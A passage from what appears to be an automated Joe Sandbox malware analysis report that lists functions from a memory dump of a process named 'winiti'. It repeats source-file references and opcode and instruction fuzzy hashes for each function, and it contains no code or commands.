                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                      • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                      • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                      • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                      Function 0094F900 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                      Function 00951930 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                      • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                      • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                      • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                      Function 0094F938 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                      • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                      • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                      • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                      Function 0094FAB8 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                      Function 0094FAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                      Function 0094FA20 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                      • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                      • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                      • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                      Function 0094FA50 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                      • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                      • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                      • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                      Function 0094FBB8 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                      Function 0094FBE8 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                      • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                      • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                      • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                      Function 0094FB50 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                      Function 0094FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                      Function 0094FC30 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                      • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                      • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                      • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                      Function 0094FC48 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                      • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                      • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                      • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                      Function 0094FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                      Function 00951D80 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                      • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                      • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                      • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                      Function 0094FD8C Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                      Function 0094FD5C Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                      • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                      • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                      • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                      Function 0094FEA0 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
